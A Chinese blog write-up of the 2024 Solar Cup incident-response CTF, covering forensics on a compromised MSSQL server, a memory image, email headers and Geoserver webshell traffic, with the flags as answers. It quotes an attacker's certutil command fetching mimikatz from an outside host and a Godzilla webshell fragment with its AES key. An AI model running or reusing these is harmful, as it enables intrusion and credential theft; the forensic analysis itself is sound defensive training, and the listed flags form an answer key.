首页 > 其他分享 >2024第一届Solar杯应急响应挑战赛

2024第一届Solar杯应急响应挑战赛

时间:2024-12-28 22:19:10浏览次数:5  
标签:文件 题目 数据库 2024 flag Solar 格式 挑战赛 mssql

2024第一届Solar杯应急响应挑战赛

附件密码:

KzXGabLkDjs&j@3a&fAayNmD

数据库

这里导入镜像有个问题会报错

Failed to write content to disk F:\长城杯+国赛\应急比赛\【题目】小题+综合题\solar\mssql\mssql\\mssql-disk1.vmdk. Reason: There is not enough space on the file system for the selected operation。

解决问题,打开 mssql.ovf 把这个位置,改成这几 vm 的版本,然后再将 mssql.mf 里面的哈希值替换一下,然后就能导入成功了

certutil -hashfile mssql.ovf SHA256

image-20241228170325-2k4v4qy

接着使用大白菜修改密码 Vmware虚拟机中windows系统用户名密码忘记处理方法 - 简书,这里有些几个步骤不一样,我们设置好大白菜的镜像后,开机后重启,一直按 F2 进入 BIOS界面,后面就一样了

image-20241228172055-j09u4ac

然后将镜像文件在设置回来就能用我们的密码进行登入了

image-20241228172300-jq2mg7q

数据库-1

题目:

题目附件:mssql、mssql题-备份数据库
请找到攻击者创建隐藏账户的时间
flag格式 如 flag

思路:

 我们刚刚在登入的时候有个 test$ ,直接查看这个用户就行
net user test$

image-20241228172834-8b5hu1t

flag:flag{2024/12/16 15:24:21}

数据库-2

题目附件:mssql、mssql题-备份数据库
请找到恶意文件的名称
flag格式 如 flag{ . }

思路:

上传我们的火绒剑找打

image-20241228173632-dwsai10

flag:flag{xmrig.exe}

数据库-3

题目描述:

题目附件:mssql、mssql题-备份数据库
请找到恶意文件的外联地址
flag格式 如 flag

思路:

问题 2 找到的

flag:flag{203.107.45.167}

数据库-4

题目描述:

题目附件:mssql、mssql题-备份数据库
请修复数据库
flag格式 如 flag{xxxxx}

分数

99.34 分

数据库-5

题目描述:

题目附件:mssql、mssql题-备份数据库
请提交powershell命令中恶意文件的MD5
flag格式 如 flag

内存取证

内存取证-1

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到rdp连接的跳板地址
flag格式 flag

思路:

直接查看网络扫描使用,netscan 插件,看到 443 端口连接的地址

image-20241228130008-0anhjx5

flag:flag{192.168.60.220}

内存取证-2

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者下载黑客工具的IP地址
flag格式 flag

思路:

查看一下命令扫描 cmdscan 发现执行了 curl 指令
certutil -urlcache -split -f http://155.94.204.67:85/mimikatz.exe C:\Windows\Temp\mi.exe

image-20241228130522-0om7ps8

flag:flag{155.94.204.67}

内存取证-3

题目描述:

题目文件:SERVER-2008-20241220-162057
攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么
flag格式 flag

思路:

 我们在题目 2 中发现 type pass.txt 这个命令,然后我们 找到,pass 文件使用 dumpfiles 插件导出

image-20241228150142-9ntq2pj

image-20241228150200-b6t8a37

flag:flag{GalaxManager_2012}

内存取证-4

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者创建的用户
flag格式 flag

思路:

使用 hashdump 可以查看用户名密码信息

image-20241228131840-mql5mfi

flag{ASP.NET}

内存取证-5

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者利用跳板rdp登录的时间
flag格式 flag

思路:

  找到登入的时间,我们去分析一下日志文件,先把日志文件都导出来利用 MemProcFS 这个工具,然后直接使用日志文件分析工具进行分析,全拖进去就行

image-20241228153039-19rawqn

image-20241228153134-u1219bl

flag:flag{2024/12/21 00:15:34}

内存取证-6

题目描述:

题目文件:SERVER-2008-20241220-162057
请找到攻击者创建的用户的密码哈希值
flag格式 flag

思路:

根据题目 4 可以看到 哈希值

flag:flag{5ffe97489cbec1e08d0c6339ec39416d}

签到

题目描述:

本题作为签到题,请给出邮服发件顺序。

Received: from mail.da4s8gag.com ([140.143.207.229])
by newxmmxszc6-1.qq.com (NewMX) with SMTP id 6010A8AD
for ; Thu, 17 Oct 2024 11:24:01 +0800
X-QQ-mid: xmmxszc6-1t1729135441tm9qrjq3k
X-QQ-XMRINFO: NgToQqU5s31XQ+vYT/V7+uk=
Authentication-Results: mx.qq.com; spf=none smtp.mailfrom=;
dkim=none; dmarc=none(permerror) header.from=solar.sec
Received: from mail.solar.sec (VM-20-3-centos [127.0.0.1])
by mail.da4s8gag.com (Postfix) with ESMTP id 2EF0A60264
for ; Thu, 17 Oct 2024 11:24:01 +0800 (CST)
Date: Thu, 17 Oct 2024 11:24:01 +0800
To: hellosolartest@qq.com
From: 鍏嬪競缃戜俊
Subject:xxxxxxxxxx
Message-Id: <20241017112401.032146@mail.solar.sec>
X-Mailer: QQMail 2.x

XXXXXXXXXX

flag格式为flag{domain1|...|domainN}

flag:flag{mail.solar.sec|mail.da4s8gag.com|newxmmxszc6-1.qq.com}

日志流量

日志流量-1

题目描述:

题目文件:tomcat-wireshark.zip/web
新手运维小王的Geoserver遭到了攻击:
黑客疑似删除了webshell后门,小王找到了可能是攻击痕迹的文件但不一定是正确的,请帮他排查一下。
flag格式 flag

思路:

直接使用 D 盾进行扫描,扫到一个后门文件

image-20241228134213-4d5g05u

image-20241228134451-khrx4x4

发现密文

ZiFsXmEqZ3tBN2I0X1g5ektfMnY4Tl93TDVxNH0=

image-20241228134515-2676a8s

flag:flag{A7b4_X9zK_2v8N_wL5q4}

日志流量-2

题目描述:

题目文件:tomcat-wireshark.zip/web
新手运维小王的Geoserver遭到了攻击:
小王拿到了当时被入侵时的流量,其中一个IP有访问webshell的流量,已提取部分放在了两个pcapng中了。请帮他解密该流量。
flag格式 flag{xxxx}

分数

85.95 分

思路:

通过题目 1 我们能找到 aes 加密的密钥:a2550eeab0724a69
 String code="ZiFsXmEqZ3tBN2I0X1g5ektfMnY4Tl93TDVxNH0="; String xc="a2550eeab0724a69"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}

查看流量包也知道这是一个哥斯拉的流量,解密就行

image-20241228135237-01u6kq7

flag:flag{sA4hP_89dFh_x09tY_lL4SI4}

日志流量-3

题目描述:

题目文件:tomcat-wireshark.zip/web
新手运维小王的Geoserver遭到了攻击:
小王拿到了当时被入侵时的流量,黑客疑似通过webshell上传了文件,请看看里面是什么。
flag格式 flag

逆向破解

逆向破解-1

题目描述:

题目文件:【题目】加密器逆向
请逆向该加密器,解密机密文件
flag格式 flag

综合应急

综合应急-1

基本全蒙的没时间了,找到了一些 ip 和 PowerShell 命令

image-20241228161806-ru1rdrc

综合应急-2

题目描述:

题目文件:FOG日志
攻击者上传了代理工具,请写出他的最终存放路径
格式为flag

标签:文件,题目,数据库,2024,flag,Solar,格式,挑战赛,mssql
From: https://www.cnblogs.com/lpppp/p/18638061

相关文章

  • 2024-2025-1 20241307《计算机基础与程序设计》第十四周学习总结
    作业信息这个作业属于哪个课程(2024-2025-1-计算机基础与程序设计)这个作业要求在哪里([2024-2025-1计算机基础与程序设计第十四周作业]这个作业的目标作业正文(2024-2025-1学号20241307《计算机基础与程序设计》第十四周学习总结)教材学习内容总结C语言程序......
  • 2024/12/28课堂记录
    目录最大连续和木材加工(月度开销)跳石头作业:修剪草坪最大连续和复习一下这次只写了朴素的dp版,注意,不要用贪心,因为单调队列只能优化dp很简单,注释都不用写了#include<iostream>usingnamespacestd;inta[200010],f[200010];intmain(){ intn,m; cin>>n>>m;......
  • [20241227]字符串转换成列表问题.txt
    [20241227]字符串转换成列表问题.txt--//开发经常会写sql语句,经常会出现in('111122','1111113'..,'2222111')之类的情况,一般语句in里面内容经常变化,导致无法使--//用绑定变量。--//实际上以前例子,通过建立type,然后建立函数将拼接的字符串转换为数字或者字符串列表。--//前几天有......
  • 2024/12/17 【字符串】LeetCode 459.重复的子字符串 【❌】
    https://programmercarl.com/0459.%E9%87%8D%E5%A4%8D%E7%9A%84%E5%AD%90%E5%AD%97%E7%AC%A6%E4%B8%B2.html#%E6%80%9D%E8%B7%AFhttps://leetcode.cn/problems/repeated-substring-pattern/子串结束位置大于中间位置的话,一定不能重复组成字符串。如果next[len-1]!=-1,则说......
  • 2024-2025-1 20241413 《计算机基础与程序设计》第十四周学习总结
    |班级链接|https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP||作业要求|https://www.cnblogs.com/rocedu/p/9577842.html#WEEK14|教材学习内容总结《c语言程序设计>第十三,十四章第13章:文件操作文件的概念:介绍文件的基本概念,包括文件的分类(文本文件和二进制文件)以及文......
  • 2024-12-28:求出出现两次数字的 XOR 值。用go语言,给定一个数组 nums,其中的数字出现的频
    2024-12-28:求出出现两次数字的XOR值。用go语言,给定一个数组nums,其中的数字出现的频率要么是一次,要么是两次。请找出所有出现两次的数字,并计算它们的按位XOR值。如果没有数字出现两次,则返回0。1<=nums.length<=50。1<=nums[i]<=50。nums中每个数字要么出现过一......
  • 【2024年终总结】从初入博客到出入博客
    2024年已经过去了,我自己其实回头看看有的时候挺感慨的,因为我做过的事情比较多,本身我做过央国企的员工(物流管理),后来跟随初创团队去外面打拼做互联网(程序员),又到后来回运营商(还是央国企)做方案(售前售后),再往后做到央企的销售管理(班子成员),始终没想到自己的路线有这么多变数,但是也正是因......
  • 学期(2024-2025-1) 学号(20241420) 《计算机基础与程序设计》第十四周学习总结
    学期(2024-2025-1)学号(20241420)《计算机基础与程序设计》第十四周学习总结作业信息这个作业属于哪个课程<班级的链接>(如2024-2025-1-计算机基础与程序设计)这个作业要求在哪里<作业要求的链接>(2024-2025-1计算机基础与程序设计第十四周作业)这个作业的目标<《C语......
  • PhpStorm 2024.3完整版的安装教程(附激活,常见问题处理)
    卸载老版本PhpStorm首先,如果小伙伴的电脑上有安装老版本的PhpStorm,需要将其彻底卸载掉,如下所示(没有安装则不用管,直接安装即可):TIP:如果你之前使用过本站提供的 激活到2025年版本脚本,需要执行对应卸载脚本/适用2024版本/JetBrains2023最新全家桶/jetbra/scripts/unin......
  • 2024第一届Solar杯应急响应挑战赛WP
    对于一个只学了2个月的小白来说这种比赛难度还是太高了,还要沉淀一下QAQ内存取证-1题目描述题目文件:SERVER-2008-20241220-162057请找到rdp连接的跳板地址flag格式flag{1.1.1.1}先imageinfo然后netscanF:\CTF软件合集\Misc杂项\隐写工具\取证类\volatility\VolatilityWor......